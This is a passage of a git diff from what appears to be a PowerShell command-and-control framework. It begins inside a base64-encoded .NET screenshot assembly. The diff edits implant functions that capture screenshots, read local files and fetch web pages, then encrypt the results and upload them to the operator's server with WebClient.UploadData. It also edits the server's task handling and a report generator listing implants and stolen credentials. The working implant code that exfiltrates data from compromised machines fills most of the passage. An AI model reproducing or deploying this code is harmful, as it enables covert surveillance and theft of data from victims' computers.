CEAAgADACJAAkAEACOAC4ACwBnAS4AEwBwAS4AGwCPAS4AIwCYAS4AKwCoAS4AMwCoAS4AOwCoAS4AQwCYAS4ASwCuAS4AUwCoAS4AWwCoAS4AYwDGAS4AawDwAUEAkwBhAJUAGgAuAFEAcQOGA3sDAQAAAQMAVgYBAAABBQBYBAEAAAEHABEAAQAAAQkALgABAAABCwD9BQEAAAENANkGAgAAAQ8AQQACAAABEQAkAAIAAAETABIGAQBAARsAzgYCAEABHQABBwIAAAEfADsAAgAAASEA7wUCAEABIwDqBgMAAAEnAP8EAgAAASkApwUCAAABKwAuBAIARgEtAAQEAgAAAS8A8QMCAEABMQC6BQIAQAEzAK4EAgBAATUAugQCAAABNwCYBAIAAAE5ANwFAgBAATsAFgQEAEABPQDABgIAAAE/ACEBAgAAAUEA1wACAASAAAABAAAAAAAAAAAAAAAAAIYGAAACAAAAAAAAAAAAAABtAJIAAAAAAAIAAAAAAAAAAAAAAHYANAMAAAAAAgAAAAAAAAAAAAAAbQCDBQAAAAADAAIABAACAAUAAgAGAAIAAAAAdXNlcjMyADxNb2R1bGU+AENyZWF0ZUNvbXBhdGlibGVEQwBSZWxlYXNlREMARGVsZXRlREMAaERDAEdldERDAEdldFdpbmRvd0RDAE1BWElNVU1fQUxMT1dFRABXSU5TVEFfQUxMX0FDQ0VTUwBDQVBUVVJFQkxUAFNSQ0NPUFkAZ2V0X1dvcmtpbmdBcmVhAG1zY29ybGliAGhEYwBhYmMAUmVsZWFzZUhkYwBHZXRIZGMAaGRjAGxwRW51bUZ1bmMAblhTcmMAbllTcmMAaGRjU3JjAEdldFdpbmRvd1RocmVhZFByb2Nlc3NJZABoV25kAGh3bmQAbWV0aG9kAEZyb21JbWFnZQBFbmRJbnZva2UAQmVnaW5JbnZva2UASXNXaW5kb3dWaXNpYmxlAFdpbmRvd0hhbmRsZQBoYW5kbGUAUmVjdGFuZ2xlAERlc2t0b3BOYW1lAGxwQ2xhc3NOYW1lAGxwV2luZG93TmFtZQBuYW1lAFZhbHVlVHlwZQBDYXB0dXJlAEVudW1XaW5kb3dTdGF0aW9uc0RlbGVnYXRlAEVudW1EZXNrdG9wc0RlbGVnYXRlAEVudW1EZXNrdG9wV2luZG93c0RlbGVnYXRlAE11bHRpY2FzdERlbGVnYXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU3lzdGVtLkRyYXdpbmcAZ2V0X1dpZHRoAG5XaWR0aAB3aWR0aABBc3luY0NhbGxiYWNrAGNhbGxiYWNrAGdkaTMyLmRsbABVc2VyMzIuZGxsAHVzZXIzMi5kbGwAU2NyZWVuc2hvdC5kbGwAbFBhcmFtAFN5c3RlbQBCb3R0b20AU2NyZWVuAENhcHR1cmVSZWdpb24AcmVnaW9uAFVuaW9uAHdpblN0YXRpb24Ad2luZG93c1N0YXRpb24AQ2xvc2VXaW5kb3dTdGF0aW9uAE9wZW5XaW5kb3dTdGF0aW9uAEdldFByb2Nlc3NXaW5kb3dTdGF0aW9uAFNldFByb2Nlc3NXaW5kb3dTdGF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAENyZWF0ZUNvbXBhdGlibGVCaXRtYXAARnJvbUhiaXRtYXAAZHdSb3AAZ2V0X1RvcABDYXB0dXJlRGVza3RvcABDbG9zZURlc2t0b3AAaERlc2t0b3AAT3BlbkRlc2t0b3AAT3BlbklucHV0RGVza3RvcABkZXNrdG9wAFN0cmluZ0J1aWxkZXIAaHduZENoaWxkQWZ0ZXIALmN0b3IAR3JhcGhpY3MAR2V0U3lzdGVtTWV0cmljcwBTeXN0ZW0uRGlhZ25vc3RpY3MAZ2V0X0JvdW5kcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBuRmxhZ3MAU3lzdGVtLldpbmRvd3MuRm9ybXMAZ2V0X0FsbFNjcmVlbnMARW51bVdpbmRvd1N0YXRpb25zAEVudW1EZXNrdG9wcwBscHN6Q2xhc3MAbmVlZEFjY2VzcwBFbnVtRGVza3RvcFdpbmRvd3MAR2V0V2luZG93UmVjdABEZWxldGVPYmplY3QAaE9iamVjdABTZWxlY3RPYmplY3QAb2JqZWN0AHJlY3QAZ2V0X0xlZnQAUmlnaHQAZ2V0X0hlaWdodABuSGVpZ2h0AGZJbmhlcml0AEJpdEJsdABJQXN5bmNSZXN1bHQAcmVzdWx0AGh3bmRQYXJlbnQAbk1heENvdW50AFNjcmVlbnNob3QAaGRjRGVzdABueERlc3QAbnlEZXN0AFN5c3RlbS5UZXh0AGxwV2luZG93VGV4dABHZXRXaW5kb3dUZXh0AEZpbmRXaW5kb3cAR2V0RGVza3RvcFdpbmRvdwBQcmludFdpbmRvdwBscHN6V2luZG93AEZpbmRXaW5kb3dFeAB3b3JraW5nQXJlYU9ubHkARW1wdHkAAAAAAMgUTmDMAYJGtc9up0YeCB0ABCABAQgDIAABBSABARERBCABAQ4EIAEBAgkHBhgYGBgYEkEDIAAIBQABEkEYCgcEEUUdEkkIEkkDBhFFBQAAHRJJBCAAEUUIAAIRRRFFEUUFBwIRDBgFIAIBCAgGAAESZRJhAyAAGAQgAQEYCLd6XFYZNOCJCLA/X38R1Qo6BCAAzAAEAAAAQAQAAAACBH8DAAABAgEWAgYIAgYJDAAJAhgICAgIGAgICAYAAxgYCAgEAAEYGAMAABgFAAICGBgFAAIYGBgGAAESQRFFBAAAEkEFAAESQQIFAAIYDg4HAAQYGBgODgcAAhgYEBEMBgADAhgYCQQAAQgIBgACAhIQGAQAAQIYBgADGA4CCQcAAwIYEhQYBwAEGA4JAgkGAAMYCQIJBwADAhgSGBgHAAMIGBJNCAYAAhgYEBgFIAIBHBgFIAICDhgJIAQSWQ4YEl0cBSABAhJZBSACAhgICSAEElkYCBJdHAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAPAQAKU2NyZWVuc2hvdAAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAxNwAAKQEAJDQyNGIyMjY4LTY0MzctNDgyNy1iMDVjLTNmNmMyN2ZjMGY0MgAADAEABzEuMC4wLjAAAAAAAAAAAABJzkZaAAAAAAIAAAAcAQAA7DMAAOwVAABSU0RTbxrdln4JwUiXVZw4MAy/MAEAAABDOlxVc2Vyc1xhZG1pblxzb3VyY2VccmVwb3NcU2NyZWVuc2hvdFxTY3JlZW5zaG90XG9ialxSZWxlYXNlXFNjcmVlbnNob3QucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADA1AAAAAAAAAAAAAEo1AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8NQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAACwDAAAAAAAAAAAAACwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsASMAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAABoAgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAAPgALAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAFMAYwByAGUAZQBuAHMAaABvAHQAAAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4AMAAAAD4ADwABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAUwBjAHIAZQBlAG4AcwBoAG8AdAAuAGQAbABsAAAAAABIABIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAxADcAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAEYADwABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABTAGMAcgBlAGUAbgBzAGgAbwB0AC4AZABsAGwAAAAAADYACwABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAUwBjAHIAZQBlAG4AcwBoAG8AdAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAMAAAAXDUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" @@ -409,11 +413,10 @@ function Get-ScreenshotAllWindows { $bitmap.save($msimage, "bmp") $b64 = [Convert]::ToBase64String($msimage.toarray()) $bitmap.Dispose(); - $ReadCommand = "get-screenshot" - $ReadCommand = Encrypt-String $key $ReadCommand + $eid = Encrypt-String $key $TaskId $send = Encrypt-String2 $key $b64 $UploadBytes = getimgdata $send - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null } catch {} } $error.clear() @@ -446,7 +449,8 @@ function Download-File { param ( - [string] $Source + [string] $Source, + [string] $TaskId ) try { $fileName = Resolve-PathSafe $Source @@ -475,20 +479,18 @@ function Download-File $preNumbers = ($ChunkedByte+$totalChunkByte) $readSize = $bufferSize; $chunkBytes = $str.ReadBytes($readSize); - $ReadCommand = "download-file "+$fullNewname - $ReadCommand = Encrypt-String $key $ReadCommand + $eid = Encrypt-String $key $TaskId $send = Encrypt-Bytes $key ($preNumbers+$chunkBytes) $UploadBytes = getimgdata $send - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null ++$Chunk } until (($size -= $bufferSize) -le 0); } catch { - $Output = "ErrorCmd: " + $error[0] - $ReadCommand = "Error downloading file "+$fullnewname - $ReadCommand = Encrypt-String $key $ReadCommand + $Output = "ErrorDownload: " + $error[0] + $eid = Encrypt-String $key $TaskId $send = Encrypt-String2 $key $output $UploadBytes = getimgdata $send - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null } } function Posh-Delete @@ -755,15 +757,17 @@ try { } } Function Get-Webpage { - param ($url) + param ( + [string] $url, + [string] $TaskId + ) $file = (New-Object System.Net.Webclient).DownloadString($url)|Out-String - $ReadCommand = "download-file web.html" - $ReadCommand = Encrypt-String $key $ReadCommand + $eid = Encrypt-String $key $TaskId $bytes = [System.Text.Encoding]::UTF8.GetBytes($file) $base64 = [Convert]::ToBase64String($bytes) $Output = Encrypt-String2 $key $base64 $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null } Function AutoMigrate { if (($p = Get-Process | ? {$_.id -eq $pid}).name -eq "powershell") { diff --git a/OfflineReportGenerator.py b/OfflineReportGenerator.py index 5a2351e..07b9e08 100644 --- a/OfflineReportGenerator.py +++ b/OfflineReportGenerator.py @@ -204,7 +204,7 @@ function SearchTask() { function tweakMarkup(){ // Add classes to columns - var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'prompt','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] + var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] tbl = document.getElementById("PoshTable"); ths = tbl.getElementsByTagName("th"); for( i=0; i'; td.onclick = toggleHide @@ -327,7 +327,7 @@ table { table tr th.randomuri { width: 15%; } - table tr th.prompt { + table tr th.user { width: 10%; } @@ -349,7 +349,7 @@ __________ .__. _________ ________ """ - if table == "CompletedTasks": + if table == "Tasks": HTMLPre += """ @@ -366,13 +366,13 @@ __________ .__. _________ ________ frame = pd.read_sql_query("SELECT * FROM %s" % table, conn) # encode the Output column - if table == "CompletedTasks": + if table == "Tasks": for index, row in frame.iterrows(): frame.loc[index, "Command"] = replace_tabs(cgi.escape(row["Command"])) frame.loc[index, "Output"] = replace_tabs(cgi.escape(row["Output"])) # convert the random uri to original hostname - if table == "CompletedTasks": + if table == "Tasks": framelen = frame['RandomURI'].count() for x in range(0, framelen): try: @@ -398,7 +398,7 @@ __________ .__. _________ ________ HTMLPost = HTMLPost.replace("RandomURI","RandomURI") HTMLPost = HTMLPost.replace("Command","Command") HTMLPost = HTMLPost.replace("Output","Output") - HTMLPost = HTMLPost.replace("Prompt","Prompt") + HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("ImplantID","ImplantID") HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("Hostname","Hostname") @@ -422,7 +422,7 @@ tweakMarkup(); output_file.close() print reportname -generate_table("CompletedTasks") +generate_table("Tasks") generate_table("C2Server") generate_table("Creds") generate_table("Implants") diff --git a/Tasks.py b/Tasks.py index 8749a4e..a5850ad 100644 --- a/Tasks.py +++ b/Tasks.py @@ -15,6 +15,7 @@ def newTask(path): if RandomURI in path and tasks: for a in tasks: command = a[2] + user_command = command hostinfo = DB.get_hostinfo(RandomURI) now = datetime.datetime.now() print Colours.YELLOW,"" @@ -47,11 +48,17 @@ def newTask(path): except Exception as e: print "Cannot find module, loadmodule is case sensitive!" print e + taskId = DB.insert_task(RandomURI, user_command, None) + if len(str(taskId)) > 5: + raise ValueError('Task ID is greater than 5 characters which is not supported.') + taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId) + command = taskIdStr + command if commands: commands += "!d-3dion@LD!-d" + command else: commands += command DB.del_newtasks(str(a[0])) + if commands is not None: multicmd = "multicmd%s" % commands